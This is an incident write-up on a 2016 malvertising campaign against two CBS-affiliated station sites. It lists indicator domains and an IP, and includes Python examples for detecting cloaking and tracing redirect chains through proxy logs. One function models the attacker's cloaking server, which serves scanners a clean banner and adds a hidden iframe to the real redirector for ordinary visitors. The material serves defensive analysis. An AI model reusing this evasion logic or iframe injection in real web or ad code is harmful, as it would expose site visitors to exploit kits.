Cyber Incident Victim: CBS-affiliated Television Stations
Date:
May 2016
Location:
United States of America
Summary
A malvertising campaign exposed visitors of two CBS-affiliated television station websites to the Angler exploit kit by abusing the Taggify self-serve ad platform. A rogue advertiser used hijacked GoDaddy accounts to set up subdomains (including som.barkisdesign.com) that alternated between serving a legitimate banner and a hidden iframe leading to the exploit kit, choosing the response by user agent and client IP so that automated scanners received clean content while real users were served the exploit. The campaign was still active when it was discovered; the researchers who found it worked with the ad platform and the domain registrar to take down the malicious subdomains and the IP address used to distribute the payload.
Description
On or around May 4, 2016, two CBS-affiliated television stations, KMOV in St. Louis, Missouri, and WBTV in Charlotte, North Carolina, suffered a malvertising incident that exposed their website visitors to the Angler exploit kit. A rogue advertiser abused the Taggify self-serve advertising platform to push malicious code into ad placements on the stations' sites. The attacker used hijacked GoDaddy accounts to register and configure subdomains, including som.barkisdesign.com, that hosted both legitimate-looking banner ads and malicious redirects. These subdomains served different content depending on who was asking: a clean advertisement to web crawlers and scanners, and a hidden malicious iframe to genuine visitors, with the choice driven by time of day, user agent, and IP reputation. The iframe redirected the browser through parkwateavereverende.fredricholmgren.se to Angler exploit kit landing pages that attempted to drop further malware.
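The cloaking described above is what makes this class of campaign hard to catch with a single scanner fetch. The following is an added example, not code from the original report or from Malwarebytes or Taggify: a hypothetical model of the cloaking ad server (clean banner for anything that looks like a scanner, banner plus hidden iframe for real browsers during an active window) alongside a differential probe that requests the same ad slot under several client identities and flags the slot as cloaked when the responses diverge. The scanner IP range, user-agent strings, hour window and HTML are constructed for the demo; only the redirector domain comes from the report.

```python
"""Differential probing to expose a cloaked ad slot.

Added example, not code from the original report or from Malwarebytes/Taggify.
serve_ad() is a hypothetical model of the cloaking behaviour described in the
report; SCANNER_NETS, SCANNER_UA_MARKERS, the active-hours window and the HTML
bodies are constructed for the demo.
"""
import hashlib
import ipaddress
import re

# Constructed: a range a cloaking server might treat as "security vendor / crawler".
SCANNER_NETS = [ipaddress.ip_network("203.0.113.0/24")]  # TEST-NET-3 placeholder
SCANNER_UA_MARKERS = ("bot", "crawler", "curl", "python-requests", "wget")

CLEAN_BANNER = ('<a href="https://example.com/promo">'
                '<img src="/banner.jpg" width="728" height="90"></a>')
# Redirector domain from the report; the query string is constructed.
MALICIOUS_IFRAME = ('<iframe src="http://parkwateavereverende.fredricholmgren.se/?id=1" '
                    'width="1" height="1" style="display:none"></iframe>')


def serve_ad(user_agent: str, client_ip: str, hour: int) -> str:
    """Hypothetical cloaking ad server.

    Returns only the clean banner to anything that looks like a scanner, or
    outside the active window; otherwise appends the hidden exploit iframe.
    """
    ua = user_agent.lower()
    ip = ipaddress.ip_address(client_ip)
    looks_like_scanner = (any(m in ua for m in SCANNER_UA_MARKERS)
                          or any(ip in net for net in SCANNER_NETS))
    in_active_window = 6 <= hour < 23  # constructed: serve exploits in daytime only
    if looks_like_scanner or not in_active_window:
        return CLEAN_BANNER
    return CLEAN_BANNER + MALICIOUS_IFRAME


# A 1x1 or display:none iframe is the classic exploit-kit injection shape.
HIDDEN_IFRAME = re.compile(
    r'<iframe[^>]*(?:width="[01]"|height="[01]"|display\s*:\s*none)[^>]*>', re.I)


def probe(fetch, profiles):
    """Fetch the same ad slot under several client identities and compare.

    fetch(user_agent, client_ip, hour) -> html body.
    A slot whose body hash differs between profiles is cloaking; any profile
    whose body carries a hidden iframe is the one real visitors would get.
    """
    results = {}
    for name, (ua, ip, hour) in profiles.items():
        body = fetch(ua, ip, hour)
        results[name] = {
            "sha256": hashlib.sha256(body.encode()).hexdigest()[:12],
            "hidden_iframe": bool(HIDDEN_IFRAME.search(body)),
        }
    distinct_bodies = {r["sha256"] for r in results.values()}
    return {
        "cloaked": len(distinct_bodies) > 1,
        "infected_profiles": sorted(n for n, r in results.items() if r["hidden_iframe"]),
        "responses": results,
    }


CHROME_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36")

# Constructed probe set: a vendor scanner, a bare curl, a browser by day and by night.
PROFILES = {
    "scanner": ("Mozilla/5.0 (compatible; SecurityBot/1.0)", "203.0.113.7", 14),
    "curl": ("curl/8.4.0", "198.51.100.9", 14),
    "chrome_day": (CHROME_UA, "198.51.100.9", 14),
    "chrome_night": (CHROME_UA, "198.51.100.9", 3),
}


def run_probe():
    """Probe the hypothetical server with all profiles and return the verdict."""
    return probe(serve_ad, PROFILES)


if __name__ == "__main__":
    verdict = run_probe()
    print("cloaked:", verdict["cloaked"])
    print("profiles served the exploit iframe:", verdict["infected_profiles"])
```

The point of the probe is that a scanner which only ever fetches as itself, from its own address range, sees the clean banner every time; the cloaking is only visible when the same slot is compared across a browser-like user agent, a residential-looking source address and the hours the actor considers worth serving.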

Malwarebytes researchers identified the attack chain while it was still live and documented its progression from the publisher sites (kmov.com and wbtv.com) through Taggify's data.rtbfy.com ad platform to the attacker-controlled infrastructure. The threat actors used IP address 199.255.137.197 to host the malicious JavaScript. Upon discovery, Malwarebytes notified Taggify, the affected television stations, and GoDaddy so that the infrastructure could be taken down. Taggify shut the campaign down on its platform by May 5, ending active infections. Monitoring through November 2016 showed no recurrence of malicious activity via Taggify's platform, and the company added proactive detection to catch similar malvertising campaigns. The incident shows how exposed programmatic advertising ecosystems are to credential compromise and domain abuse as a delivery path for exploit kits.
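The hop sequence the report gives (publisher site, ad platform, hijacked subdomain, redirector) is exactly what an analyst has to reconstruct from proxy logs to tell which users were served the exploit path rather than just the banner. The block below is an added example, not from the original report: it parses constructed proxy log lines and walks each client's referer chain backwards from any request to a known indicator, so the full path from the station homepage to the redirector falls out. The timestamps, client addresses, paths and the unrelated CDN request are invented; the hostnames in the chain are the ones the report names.

```python
"""Rebuild a malvertising redirect chain from proxy logs via referer walking.

Added example, not from the original report. LOG is constructed to mirror the
hop sequence the report describes; timestamps, client IPs, paths and the
cdn.example.net noise line are invented.
"""
from collections import defaultdict
from urllib.parse import urlparse

# Constructed proxy log: timestamp client_ip url referer ("-" when absent).
LOG = """\
2016-05-04T15:02:11Z 10.1.2.3 http://www.kmov.com/ -
2016-05-04T15:02:12Z 10.1.2.3 http://data.rtbfy.com/ad?slot=1 http://www.kmov.com/
2016-05-04T15:02:12Z 10.1.2.3 http://som.barkisdesign.com/banner.js http://data.rtbfy.com/ad?slot=1
2016-05-04T15:02:13Z 10.1.2.3 http://parkwateavereverende.fredricholmgren.se/?id=1 http://som.barkisdesign.com/banner.js
2016-05-04T15:02:13Z 10.1.2.3 http://cdn.example.net/jquery.js http://www.kmov.com/
2016-05-04T15:03:40Z 10.1.2.9 http://www.wbtv.com/ -
2016-05-04T15:03:41Z 10.1.2.9 http://data.rtbfy.com/ad?slot=1 http://www.wbtv.com/
"""

# Hostnames the report identifies as attacker-controlled.
IOC_HOSTS = {"som.barkisdesign.com", "parkwateavereverende.fredricholmgren.se"}


def parse(log: str):
    """Turn the whitespace-separated log into event dicts with the host split out."""
    events = []
    for line in log.splitlines():
        ts, client, url, ref = line.split()
        events.append({
            "ts": ts,
            "client": client,
            "url": url,
            "host": urlparse(url).hostname,
            "referer": None if ref == "-" else ref,
        })
    return events


def chains(events):
    """Per client, walk referers backwards from each IOC hit to the first page.

    Returns {client_ip: [host, host, ...]} ordered from the page the user
    opened to the deepest IOC host reached. Clients that never touched an IOC
    (here 10.1.2.9, who only got the ad platform) are absent from the result.
    """
    by_client = defaultdict(dict)  # client -> url -> event
    for e in events:
        by_client[e["client"]][e["url"]] = e

    result = {}
    for client, urls in by_client.items():
        for event in urls.values():
            if event["host"] not in IOC_HOSTS:
                continue
            hops = [event["host"]]
            cur = event
            # Follow the referer as long as it resolves to a request we logged.
            while cur["referer"] in urls:
                cur = urls[cur["referer"]]
                hops.append(cur["host"])
            hops.reverse()
            # Keep the longest chain per client: the deepest IOC subsumes earlier ones.
            if client not in result or len(hops) > len(result[client]):
                result[client] = hops
    return result


def affected_clients(log: str = LOG):
    """Convenience wrapper: clients that reached an IOC host, with their chains."""
    return chains(parse(log))


if __name__ == "__main__":
    for client, hops in affected_clients().items():
        print(client, " -> ".join(hops))
```

Two practical notes. Referer walking only works where the log actually records the referer and where the chain did not pass through a cross-origin redirect that strips it; when a hop is missing, the walk stops early and the partial chain is still worth reporting. And a client that reached data.rtbfy.com but no IOC host is not evidence of a clean visit: with cloaking in play, the ad platform served that client whatever the attacker chose, so the absence of a deeper hop should be read as "not observed", not "not infected".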
